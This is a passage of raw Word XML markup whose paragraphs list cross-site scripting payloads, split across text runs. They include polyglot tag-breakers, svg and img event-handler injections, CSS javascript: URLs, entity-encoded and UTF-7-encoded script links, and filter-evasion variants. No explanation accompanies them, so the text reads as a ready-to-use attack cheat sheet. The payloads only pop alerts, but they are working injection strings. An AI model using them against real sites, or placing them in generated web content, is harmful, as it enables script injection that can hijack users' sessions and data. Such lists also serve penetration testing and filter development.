        <w:t>//%0D%0A%0d%0a//&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stYle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>titLe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teXtarEa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scRipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/--!&gt;\x3csVg/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNloAd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)//&gt;\x3e`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B1C50" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3BF9DE30" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;svg/onload=alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDA8F5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1BD7B0D3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;&amp;token</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'unsafe-inline'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA73ED5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="77224359" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="0036754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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data:image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/svg+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xml,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3Csvg%20onload=alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3E"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EA297" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2D308566" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onafterprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A6E5A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="28E8336F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onbeforeprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA27983" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6DCC3811" w14:textId="50321D7F" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onbeforeunload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FCE80" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7DF1D4BF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onhashchange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B91D5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3C966854" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D3115" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6DC0F946" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE&gt;.XSS{background-image:url("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS')")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F27DC02" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="572FE9A7" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE type="text/css"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BODY{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>background:url("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS')"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64239CF5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4549556B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;DIV STYLE="background-image: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS'))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295ED1B9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="35A0769B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;DIV STYLE="width: expression(alert('XSS'));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2EE53" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6DADD412" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE&gt;@im\port'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>\ja\vasc\ript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("XSS")';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADA249" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6037AC26" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(88,83,83))"&gt;Click </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Me!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D421A5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2F1B89BD" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a href="&amp;#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>106;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>118;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>115;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>99;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>114;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>105;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>112;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>116;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>58;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>108;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>101;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>114;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>116;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>40;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>39;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>88;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>83;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>83;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>39;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">#41;"&gt;Click </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Me!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7FE67C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1BBA002F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a href="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29"&gt;Click Me&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A5DC72" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7B06E54A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52974CF4" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="11701D43" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bgsound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onPropertyChange</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F470B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6BF53135" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;applet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386DB1A5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6344D64A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;marquee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onStart</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DDBC6F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6F92C936" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;frameset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onFocus</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E031E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7F0A8251" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;xml </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onPropertyChange</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51365755" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2CC1461A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlframe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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>urn:schemas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-microsoft-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>com:vml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> style=behavior:url(#default#vml</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);position</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>absolute;width</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:100</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>%;height</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">:100% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s#xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB0E58" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7651F09A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;math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(1)"&gt;CLICKME&lt;/math&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40882B59" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="42F3C249" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;event-source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="%(event)s" onload="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7132E7" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3DBA8D3A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;meta charset="x-imap4-modified-utf7"&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8C496" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="092A7228" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a"/onclick=(confirm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;Click Here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A1CD5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4DE0E8FA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>Dec: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload=prompt%26%230000000040document.domain)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EC9DF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hex: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload=prompt%26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>000000028;document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.domain)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E633B64" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5FEA3AD3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
